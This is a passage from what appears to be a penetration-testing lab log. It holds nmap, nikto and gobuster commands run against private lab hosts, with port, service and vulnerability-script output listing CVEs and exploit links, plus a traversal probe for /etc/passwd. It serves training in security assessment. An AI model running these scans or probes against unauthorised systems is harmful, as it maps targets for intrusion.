Host is up.
All 65535 scanned ports on 192.168.110.252 are filtered
Nmap scan report for 192.168.110.253
Host is up.
All 65535 scanned ports on 192.168.110.253 are filtered
Nmap scan report for 192.168.110.254
Host is up.
All 65535 scanned ports on 192.168.110.254 are filtered
Nmap scan report for 192.168.110.255
Host is up.
All 65535 scanned ports on 192.168.110.255 are filtered
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (256 hosts up) scanned in 13632.12 seconds
sudo nmap -sU -sV --version-intensity 0 -F -n 192.168.110.0/24 -oA Scoping/host_discovery/nmap/nmap_udp
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 09:38 CET
Nmap scan report for 192.168.110.1
Host is up (0.00046s latency).
Not shown: 97 closed ports
PORT STATE SERVICE VERSION
53/udp open domain Unbound
123/udp open ntp NTP v4 (secondary server)
514/udp open|filtered tcpwrapped
Nmap scan report for 192.168.110.60
Host is up (0.00081s latency).
All 100 scanned ports on 192.168.110.60 are closed
Nmap scan report for 192.168.110.72
Host is up (0.00057s latency).
Not shown: 99 closed ports
PORT STATE SERVICE VERSION
69/udp open tftp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port69-UDP:V=7.91%I=0%D=11/19%Time=6378968B%P=x86_64-pc-linux-gnu%r(DNS
SF:StatusRequest,40,"Welcome\x20to\x20UDP\x20backup\x20server\x20by\x20hax
SF:x0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n");
Nmap scan report for 192.168.110.73
Host is up (0.00071s latency).
All 100 scanned ports on 192.168.110.73 are closed
Nmap scan report for 192.168.110.120
Host is up (0.00079s latency).
All 100 scanned ports on 192.168.110.120 are closed
Nmap scan report for 192.168.110.135
Host is up (0.00070s latency).
All 100 scanned ports on 192.168.110.135 are closed
Nmap scan report for 192.168.110.250
Host is up (0.00079s latency).
Not shown: 99 closed ports
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.16.1 (Ubuntu Linux)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (7 hosts up) scanned in 113.51 seconds
sudo nmap -sU -sV --version-intensity 0 192.168.110.0/24 -oA Scoping/host_discovery/nmap/nmap_udp_full
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 09:48 CET
Warning: 192.168.110.1 giving up on port because retransmission cap hit (10).
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00072s latency).
Not shown: 922 closed ports, 76 open|filtered ports
PORT STATE SERVICE VERSION
53/udp open domain Unbound
123/udp open ntp NTP v4 (secondary server)
Nmap scan report for 192.168.110.60
Host is up (0.00062s latency).
All 1000 scanned ports on 192.168.110.60 are closed
Nmap scan report for 192.168.110.72
Host is up (0.0015s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
69/udp open tftp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port69-UDP:V=7.91%I=0%D=11/19%Time=6378A4F8%P=x86_64-pc-linux-gnu%r(DNS
SF:StatusRequest,40,"Welcome\x20to\x20UDP\x20backup\x20server\x20by\x20hax
SF:x0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n");
Nmap scan report for 192.168.110.73
Host is up (0.00079s latency).
All 1000 scanned ports on 192.168.110.73 are closed
Nmap scan report for 192.168.110.120
Host is up (0.00089s latency).
All 1000 scanned ports on 192.168.110.120 are closed
Nmap scan report for 192.168.110.135
Host is up (0.00056s latency).
All 1000 scanned ports on 192.168.110.135 are closed
Nmap scan report for 192.168.110.250
Host is up (0.00059s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.16.1 (Ubuntu Linux)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (7 hosts up) scanned in 3223.23 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.1 -oA machines/192_168_110_1/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 10:47 CET
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00028s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
81/tcp open http Apache httpd
222/tcp open ssh OpenSSH 8.6 (protocol 2.0)
444/tcp open ssl/http Apache httpd
1013/tcp open http Apache httpd
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/19%OT=53%CT=1%CU=41541%PV=Y%DS=1%DC=I%G=Y%TM=6378A6
OS:3B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TI=Z%II=I%TS=A)OPS(O1=
OS:M5B4ST11NW9%O2=M5B4ST11NW9%O3=M5B4NNT11NW9%O4=M5B4ST11NW9%O5=M5B4ST11NW9
OS:%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y
OS:%DF=Y%T=40%W=7210%O=M5B4NNSNW9%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD
OS:=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G
OS:%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.80 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.1 -oA machines/192_168_110_1/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:19 CET
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00055s latency).
Not shown: 952 closed ports, 46 open|filtered ports
PORT STATE SERVICE VERSION
53/udp open domain Unbound
123/udp open ntp NTP v4 (secondary server)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1031.28 seconds
nmap 192.168.110.1 -sV -oA 192_168_110_1/enumeration/nmap/vuln --script vuln -T5 -p1013
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 11:57 CET
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00033s latency).
PORT STATE SERVICE VERSION
1013/tcp open http Apache httpd
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /cgi-bin/: Potentially interesting folder
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../etc/passwd not found.
|
| References:
| http://www.exploit-db.com/exploits/1244/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_http-server-header: Apache
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 360.41 seconds
nmap 192.168.110.1 -sV -oA 192_168_110_1/enumeration/nmap/vuln --script vuln -T5 -p53,81,222,444,1013
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:05 CET
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00035s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
81/tcp open http Apache httpd
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
222/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.6:
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
444/tcp open ssl/http Apache httpd
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /cgi-bin/mj_wwwusr: Majordomo2 Mailing List (401 Unauthorized)
| /cgi-bin/vcs: Mitel Audio and Web Conferencing (AWC) (401 Unauthorized)
| /cgi-bin/ffileman.cgi?: Ffileman Web File Manager (401 Unauthorized)
| /cgi-bin/ck/mimencode: ContentKeeper Web Appliance (401 Unauthorized)
| /cgi-bin/masterCGI?: Alcatel-Lucent OmniPCX Enterprise (401 Unauthorized)
| /cgi-bin/awstats.pl: AWStats (401 Unauthorized)
| /cgi-bin/image/shikaku2.png: TeraStation PRO RAID 0/1/5 Network Attached Storage (401 Unauthorized)
|_ /cgi-bin/: Potentially interesting folder (401 Unauthorized)
|_http-server-header: Apache
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
1013/tcp open http Apache httpd
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /cgi-bin/: Potentially interesting folder
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../etc/passwd not found.
|
| References:
| http://www.exploit-db.com/exploits/1244/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_http-server-header: Apache
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 369.29 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.60 -oA machines/192_168_110_60/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:30 CET
Nmap scan report for 192.168.110.60
Host is up (0.00059s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open http nginx 1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/19%OT=21%CT=1%CU=43511%PV=Y%DS=2%DC=I%G=Y%TM=6378B0
OS:42%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10D%TI=Z%II=I%TS=A)OPS(O1=
OS:M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7
OS:%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y
OS:%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD
OS:=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G
OS:%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.45 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.60 -oA machines/192_168_110_60/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:09 CET
Warning: 192.168.110.60 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.110.60
Host is up (0.00082s latency).
All 1000 scanned ports on 192.168.110.60 are closed (967) or open|filtered (33)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1046.68 seconds
sudo nmap 192.168.110.60 -sV -oA 192_168_110_60/enumeration/nmap/ftp --script "safe and ftp-*" -T5 -p21
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-11 07:28 CET
Nmap scan report for 192.168.110.60
Host is up (0.00076s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds
nikto -h 192.168.110.60
---------------------------------------------------------------------------
+ Target IP: 192.168.110.60
+ Target Hostname: 192.168.110.60
+ Target Port: 80
+ Start Time: 2022-12-10 10:20:14 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5cbf4c736a5c7, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ 7916 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-12-10 10:21:00 (GMT1) (46 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto -h 192.168.110.60 -p 3306
---------------------------------------------------------------------------
+ Target IP: 192.168.110.60
+ Target Hostname: 192.168.110.60
+ Target Port: 3306
+ Start Time: 2022-12-10 10:08:28 (GMT1)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7917 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2022-12-10 10:08:36 (GMT1) (8 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
gobuster dir -u http://192.168.110.60:3306 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.60:3306
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/10 10:10:00 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 4369]
===============================================================
2022/12/10 10:10:00 Finished
===============================================================
sudo nmap 192.168.110.60 -sV -oA 192_168_110_60/enumeration/nmap/vuln --script vuln -T5 -p21,22,80,443,3306
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:07 CET
Nmap scan report for 192.168.110.60
Host is up (0.00074s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
|_sslv2-drown:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown:
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
3306/tcp open http nginx 1.18.0 (Ubuntu)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /database.sql: Possible database backup
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://seclists.org/fulldisclosure/2011/Aug/175
| https://www.securityfocus.com/bid/49303
| https://www.tenable.com/plugins/nessus/55976
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
|_rsa-vuln-roca: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: ERROR: Script execution failed (use -d to debug)
|_ssl-dh-params: ERROR: Script execution failed (use -d to debug)
|_ssl-heartbleed: ERROR: Script execution failed (use -d to debug)
|_ssl-poodle: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:igor_sysoev:nginx:1.18.0:
| OSV:CVE-2022-41742 0.0 https://vulners.com/osv/OSV:CVE-2022-41742
| OSV:CVE-2022-41741 0.0 https://vulners.com/osv/OSV:CVE-2022-41741
|_ OSV:CVE-2021-3618 0.0 https://vulners.com/osv/OSV:CVE-2021-3618
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.18 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.72 -oA machines/192_168_110_72/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:31 CET
Nmap scan report for 192.168.110.72
Host is up (0.00074s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
